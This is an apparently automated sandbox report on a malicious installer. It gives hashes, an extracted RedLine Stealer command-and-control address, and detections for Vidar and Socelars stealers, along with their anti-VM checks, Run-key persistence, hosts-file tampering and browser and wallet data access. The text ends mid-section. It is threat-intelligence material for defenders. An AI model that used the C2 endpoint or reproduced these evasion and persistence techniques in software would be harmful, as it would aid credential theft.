Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
1803s -
max time network
1802s -
platform
windows11_x64 -
resource
win11 -
submitted
18-09-2021 21:25
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
c9b742fa61ccc9b3afa7217f3bfe2590
-
SHA1
7c1ddc294d0d9214c1e07ba239d24ffd2a01854d
-
SHA256
5967f1aef118ddfcd1d14d5cf3f29a62a845052c9ed9ce91587c0015b1047c58
-
SHA512
27b326724da58f967c49eb0f889af63636b2f7e49b1356bf76677fcc419f8eca41eb8f2fbddc4599f1f3e83fffa6a98a2b74315857f909d78254d4083c381f99
Malware Config
Extracted
redline
ANI
45.142.215.47:27643
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4860 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5328 4936 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10808 4936 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral4/memory/5712-272-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5712-275-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral4/memory/6080-357-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20873bc74eb80e0.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20873bc74eb80e0.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 26 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5656 created 4824 5656 WerFault.exe Sat20627fa1c49.exe PID 832 created 5248 832 WerFault.exe Conhost.exe PID 6120 created 3824 6120 WerFault.exe Sat20545a92617f.exe PID 5280 created 5132 5280 WerFault.exe x3NgCE44wh3S1__Hyb5PvqVl.exe PID 5796 created 5528 5796 WerFault.exe rundll32.exe PID 3892 created 860 3892 WerFault.exe WerFault.exe PID 5848 created 4748 5848 WerFault.exe 2.exe PID 6756 created 4792 6756 WerFault.exe svchost.exe PID 6168 created 6092 6168 WerFault.exe magaTnk_A4jqEFJV8eORLHQK.exe PID 1424 created 6352 1424 WerFault.exe 4888429.exe PID 6396 created 3652 6396 WerFault.exe svchost.exe PID 3544 created 4288 3544 WerFault.exe 82ccQYnRwSkZfpeuxGHOYtVJ.exe PID 6576 created 5060 6576 WerFault.exe Qe7_6jGBbmEusoI6Z1m7NN9p.exe PID 3852 created 1152 3852 WerFault.exe 6.exe PID 4276 created 4280 4276 WerFault.exe u7WmSWxlHGRHf4l8vPpMvpUY.exe PID 6104 created 3060 6104 WerFault.exe W7aNRfk1wBRZpenTZJTDXqd2.exe PID 860 created 5144 860 WerFault.exe bM1lAK9_6qrDWhAvQCLFWrBk.exe PID 6784 created 5884 6784 WerFault.exe rundll32.exe PID 932 created 5324 932 WerFault.exe rqTLrt6ooAYbGkY2aAhbYxPP.exe PID 9784 created 10000 9784 WerFault.exe 37EC.exe PID 10264 created 8588 10264 WerFault.exe GcleanerEU.exe PID 10488 created 9168 10488 WerFault.exe gcleaner.exe PID 10432 created 8992 10432 WerFault.exe 543F.exe PID 10924 created 10848 10924 WerFault.exe rundll32.exe PID 12676 created 11564 12676 WerFault.exe BF31.exe PID 12956 created 11768 12956 WerFault.exe C85A.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5132-291-0x00000000006F0000-0x00000000007C4000-memory.dmp family_vidar behavioral4/memory/4288-548-0x0000000000A90000-0x0000000000B64000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 44 IoCs
Processes:
powershell.exeMsiExec.exeflow pid process 195 6320 powershell.exe 302 4520 MsiExec.exe 303 4520 MsiExec.exe 304 4520 MsiExec.exe 305 4520 MsiExec.exe 306 4520 MsiExec.exe 307 4520 MsiExec.exe 308 4520 MsiExec.exe 310 4520 MsiExec.exe 312 4520 MsiExec.exe 313 4520 MsiExec.exe 314 4520 MsiExec.exe 315 4520 MsiExec.exe 316 4520 MsiExec.exe 317 4520 MsiExec.exe 318 4520 MsiExec.exe 320 4520 MsiExec.exe 321 4520 MsiExec.exe 322 4520 MsiExec.exe 323 4520 MsiExec.exe 324 4520 MsiExec.exe 325 4520 MsiExec.exe 326 4520 MsiExec.exe 327 4520 MsiExec.exe 328 4520 MsiExec.exe 329 4520 MsiExec.exe 330 4520 MsiExec.exe 331 4520 MsiExec.exe 332 4520 MsiExec.exe 333 4520 MsiExec.exe 334 4520 MsiExec.exe 335 4520 MsiExec.exe 336 4520 MsiExec.exe 337 4520 MsiExec.exe 338 4520 MsiExec.exe 339 4520 MsiExec.exe 340 4520 MsiExec.exe 341 4520 MsiExec.exe 342 4520 MsiExec.exe 343 4520 MsiExec.exe 344 4520 MsiExec.exe 345 4520 MsiExec.exe 346 4520 MsiExec.exe 347 4520 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
Ze2ro.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Ze2ro.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSat20873bc74eb80e0.exeSat20ecdfe3ee79f.exeSat20578e6239.exeSat20627fa1c49.exeSat2071d99516dc03841.exeSat20ed203af5.exeSat20fbae42a4.exeSat2026ef0d60b87a3f5.exeSat2077373f11706fb7.exeSat20545a92617f.exeSat205eb4a2ece877a.exeSat200240b71b.exeSat20de8d8504.exeSat20fbae42a4.tmpZe2ro.exe1389700.scrtmpD12A_tmp.exeSat2026ef0d60b87a3f5.exeLzmwAqmV.exevGjPBrntpoqDW5Fw9L47gEoc.exe6389059.scrWerFault.exeChrome 5.exePublicDwlBrowser1100.exe2.exe5141881.scrLKTftM5cJoptCgINSoW0ED8Q.exemagaTnk_A4jqEFJV8eORLHQK.exes6pnBFURtpRt_98USqtnaTCv.exebM1lAK9_6qrDWhAvQCLFWrBk.exeQe7_6jGBbmEusoI6Z1m7NN9p.exe3379467.scrsvchost.exeJbYLmYkiL5oh_BFQXzN1N2aA.exe82ccQYnRwSkZfpeuxGHOYtVJ.exeNWXu0OucddIThdb5Qplybmke.exe9YsDhPL0CFb8u51TEbNMNQPm.exegRPQnJhorUeOOxV8vnDmDfPK.exetmpD12A_tmp.exex3NgCE44wh3S1__Hyb5PvqVl.exefOdOVTJ4cAdpEqSN_u_aeghQ.exeqFlx4UH2YUQ4dqR4Wrkd4DnA.exeu7WmSWxlHGRHf4l8vPpMvpUY.exeW7aNRfk1wBRZpenTZJTDXqd2.exe_eFGDGYkyZFPd0GWkch8P7Fe.exeasCr7xkj3vPL813Pivuf3qJz.execy3BD8IMClWAp4Sb5SGnjwsu.exeaskinstall58.execm3.exemd8_8eus.exeinst001.exesE6oyYqka7gpVuUPduXmrRUI.exeLivelyScreenRecMik18.exeConhost.exe6.exesetup_2.exe6470069.exe4888429.exe3002.exef.exeNWXu0OucddIThdb5Qplybmke.exeservices64.exepid process 4996 setup_installer.exe 4780 setup_install.exe 4792 Sat20873bc74eb80e0.exe 3748 Sat20ecdfe3ee79f.exe 4548 Sat20578e6239.exe 4824 Sat20627fa1c49.exe 4856 Sat2071d99516dc03841.exe 3968 Sat20ed203af5.exe 3948 Sat20fbae42a4.exe 4716 Sat2026ef0d60b87a3f5.exe 5040 Sat2077373f11706fb7.exe 3824 Sat20545a92617f.exe 1068 Sat205eb4a2ece877a.exe 5132 Sat200240b71b.exe 5248 Sat20de8d8504.exe 5272 Sat20fbae42a4.tmp 5772 Ze2ro.exe 5900 1389700.scr 5924 tmpD12A_tmp.exe 5712 Sat2026ef0d60b87a3f5.exe 6000 LzmwAqmV.exe 6040 vGjPBrntpoqDW5Fw9L47gEoc.exe 5468 6389059.scr 860 WerFault.exe 5812 Chrome 5.exe 5516 PublicDwlBrowser1100.exe 4748 2.exe 5732 5141881.scr 5168 LKTftM5cJoptCgINSoW0ED8Q.exe 6092 magaTnk_A4jqEFJV8eORLHQK.exe 5164 s6pnBFURtpRt_98USqtnaTCv.exe 5144 bM1lAK9_6qrDWhAvQCLFWrBk.exe 5060 Qe7_6jGBbmEusoI6Z1m7NN9p.exe 4648 3379467.scr 3652 svchost.exe 6036 JbYLmYkiL5oh_BFQXzN1N2aA.exe 4288 82ccQYnRwSkZfpeuxGHOYtVJ.exe 5340 NWXu0OucddIThdb5Qplybmke.exe 4140 9YsDhPL0CFb8u51TEbNMNQPm.exe 4784 gRPQnJhorUeOOxV8vnDmDfPK.exe 6080 tmpD12A_tmp.exe 5132 x3NgCE44wh3S1__Hyb5PvqVl.exe 588 fOdOVTJ4cAdpEqSN_u_aeghQ.exe 572 qFlx4UH2YUQ4dqR4Wrkd4DnA.exe 4280 u7WmSWxlHGRHf4l8vPpMvpUY.exe 3060 W7aNRfk1wBRZpenTZJTDXqd2.exe 1408 _eFGDGYkyZFPd0GWkch8P7Fe.exe 1656 asCr7xkj3vPL813Pivuf3qJz.exe 2416 cy3BD8IMClWAp4Sb5SGnjwsu.exe 3128 askinstall58.exe 5972 cm3.exe 5960 md8_8eus.exe 5608 inst001.exe 5140 sE6oyYqka7gpVuUPduXmrRUI.exe 6132 LivelyScreenRecMik18.exe 3484 Conhost.exe 1152 6.exe 6324 setup_2.exe 6336 6470069.exe 6352 4888429.exe 6480 3002.exe 6540 f.exe 6188 NWXu0OucddIThdb5Qplybmke.exe 6564 services64.exe -
Checks BIOS information in registry 2 TTPs 35 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
9YsDhPL0CFb8u51TEbNMNQPm.exewwl.exewwi.exe7625938.exe41F0.exeJbYLmYkiL5oh_BFQXzN1N2aA.exe798B.exeA2CF.exe5847552.scr_eFGDGYkyZFPd0GWkch8P7Fe.exe6470069.exe5141881.scr7470814.scr6389059.scrqFlx4UH2YUQ4dqR4Wrkd4DnA.exeCD79.exeInstall.exes6pnBFURtpRt_98USqtnaTCv.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9YsDhPL0CFb8u51TEbNMNQPm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wwl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7625938.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 41F0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9YsDhPL0CFb8u51TEbNMNQPm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JbYLmYkiL5oh_BFQXzN1N2aA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 798B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion A2CF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 41F0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5847552.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5847552.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 798B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion _eFGDGYkyZFPd0GWkch8P7Fe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion _eFGDGYkyZFPd0GWkch8P7Fe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6470069.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wwl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion A2CF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5141881.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7470814.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6389059.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qFlx4UH2YUQ4dqR4Wrkd4DnA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6470069.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7625938.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CD79.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7470814.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JbYLmYkiL5oh_BFQXzN1N2aA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6389059.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion s6pnBFURtpRt_98USqtnaTCv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion s6pnBFURtpRt_98USqtnaTCv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qFlx4UH2YUQ4dqR4Wrkd4DnA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5141881.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CD79.exe -
Loads dropped DLL 33 IoCs
Processes:
setup_install.exeSat20fbae42a4.tmprundll32.exeasCr7xkj3vPL813Pivuf3qJz.exesetup_2.tmpsetup_2.tmprundll32.exeinstaller.exerundll32.exeMsiExec.exeMsiExec.exeMsiExec.exepid process 4780 setup_install.exe 4780 setup_install.exe 4780 setup_install.exe 4780 setup_install.exe 4780 setup_install.exe 5272 Sat20fbae42a4.tmp 5528 rundll32.exe 1656 asCr7xkj3vPL813Pivuf3qJz.exe 6620 setup_2.tmp 3748 setup_2.tmp 5884 rundll32.exe 8784 installer.exe 8784 installer.exe 10848 rundll32.exe 8784 installer.exe 11184 MsiExec.exe 11184 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 4520 MsiExec.exe 8784 installer.exe 4520 MsiExec.exe 4520 MsiExec.exe 5996 MsiExec.exe 5996 MsiExec.exe 4520 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\6389059.scr themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
543F.exemsedge.exeZe2ro.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\service = "C:\\Users\\Admin\\AppData\\Local\\Temp\\543F.exe" 543F.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Paeshaeqalata.exe\"" Ze2ro.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
A2CF.exes6pnBFURtpRt_98USqtnaTCv.exe7625938.exeJbYLmYkiL5oh_BFQXzN1N2aA.exe5141881.scr5847552.scrwwi.exemd8_8eus.exeqFlx4UH2YUQ4dqR4Wrkd4DnA.exewwl.exe_eFGDGYkyZFPd0GWkch8P7Fe.exe6470069.exe7470814.scrCD79.exe798B.exe41F0.exe6389059.scr9YsDhPL0CFb8u51TEbNMNQPm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA A2CF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA s6pnBFURtpRt_98USqtnaTCv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7625938.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA JbYLmYkiL5oh_BFQXzN1N2aA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5141881.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5847552.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wwi.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qFlx4UH2YUQ4dqR4Wrkd4DnA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wwl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA _eFGDGYkyZFPd0GWkch8P7Fe.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6470069.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7470814.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CD79.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 798B.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 41F0.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6389059.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9YsDhPL0CFb8u51TEbNMNQPm.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exeinstaller.exemsiexec.exeInstall.exedescription ioc process File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 88 ipinfo.io 131 ipinfo.io 1 ipinfo.io 16 ip-api.com 16 ipinfo.io 26 ipinfo.io 52 ipinfo.io -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
Processes:
6389059.scrs6pnBFURtpRt_98USqtnaTCv.exe5141881.scr9YsDhPL0CFb8u51TEbNMNQPm.exeqFlx4UH2YUQ4dqR4Wrkd4DnA.exe_eFGDGYkyZFPd0GWkch8P7Fe.exe6470069.exewwl.exe7625938.exewwi.exe7470814.scr5847552.scrJbYLmYkiL5oh_BFQXzN1N2aA.exeCD79.exe798B.exeA2CF.exe41F0.exepid process 5468 6389059.scr 5164 s6pnBFURtpRt_98USqtnaTCv.exe 5732 5141881.scr 4140 9YsDhPL0CFb8u51TEbNMNQPm.exe 572 qFlx4UH2YUQ4dqR4Wrkd4DnA.exe 1408 _eFGDGYkyZFPd0GWkch8P7Fe.exe 6336 6470069.exe 7008 wwl.exe 6920 7625938.exe 6728 wwi.exe 4600 7470814.scr 5232 5847552.scr 6036 JbYLmYkiL5oh_BFQXzN1N2aA.exe 5056 CD79.exe 10008 798B.exe 10900 A2CF.exe 3524 41F0.exe -
Suspicious use of SetThreadContext 10 IoCs
Processes:
Sat2026ef0d60b87a3f5.exeWerFault.exetmpD12A_tmp.exeNWXu0OucddIThdb5Qplybmke.exe4888429.exefOdOVTJ4cAdpEqSN_u_aeghQ.exetmpB35D_tmp.exeservices64.exe7A66.exe9C56.exedescription pid process target process PID 4716 set thread context of 5712 4716 Sat2026ef0d60b87a3f5.exe Sat2026ef0d60b87a3f5.exe PID 860 set thread context of 4648 860 WerFault.exe 3379467.scr PID 5924 set thread context of 6080 5924 tmpD12A_tmp.exe tmpD12A_tmp.exe PID 5340 set thread context of 6188 5340 NWXu0OucddIThdb5Qplybmke.exe NWXu0OucddIThdb5Qplybmke.exe PID 6352 set thread context of 7016 6352 4888429.exe 4888429.exe PID 588 set thread context of 6944 588 fOdOVTJ4cAdpEqSN_u_aeghQ.exe fOdOVTJ4cAdpEqSN_u_aeghQ.exe PID 880 set thread context of 4848 880 tmpB35D_tmp.exe tmpB35D_tmp.exe PID 6564 set thread context of 4252 6564 services64.exe explorer.exe PID 3208 set thread context of 6380 3208 7A66.exe 7A66.exe PID 3472 set thread context of 6208 3472 9C56.exe 9C56.exe -
Drops file in Program Files directory 25 IoCs
Processes:
setup_2.tmpmd8_8eus.exex3NgCE44wh3S1__Hyb5PvqVl.exeultramediaburner.tmpZe2ro.exeLKTftM5cJoptCgINSoW0ED8Q.exedescription ioc process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cm3.exe x3NgCE44wh3S1__Hyb5PvqVl.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe x3NgCE44wh3S1__Hyb5PvqVl.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe x3NgCE44wh3S1__Hyb5PvqVl.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\Windows Sidebar\Paeshaeqalata.exe Ze2ro.exe File created C:\Program Files (x86)\Windows Sidebar\Paeshaeqalata.exe.config Ze2ro.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini x3NgCE44wh3S1__Hyb5PvqVl.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe LKTftM5cJoptCgINSoW0ED8Q.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-DNON4.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW md8_8eus.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe.config Ze2ro.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\PXXLGNYZKI\ultramediaburner.exe Ze2ro.exe File created C:\Program Files (x86)\UltraMediaBurner\is-A5NSH.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe x3NgCE44wh3S1__Hyb5PvqVl.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe LKTftM5cJoptCgINSoW0ED8Q.exe File created C:\Program Files (x86)\FarLabUninstaller\is-IO0VT.tmp setup_2.tmp -
Drops file in Windows directory 27 IoCs
Processes:
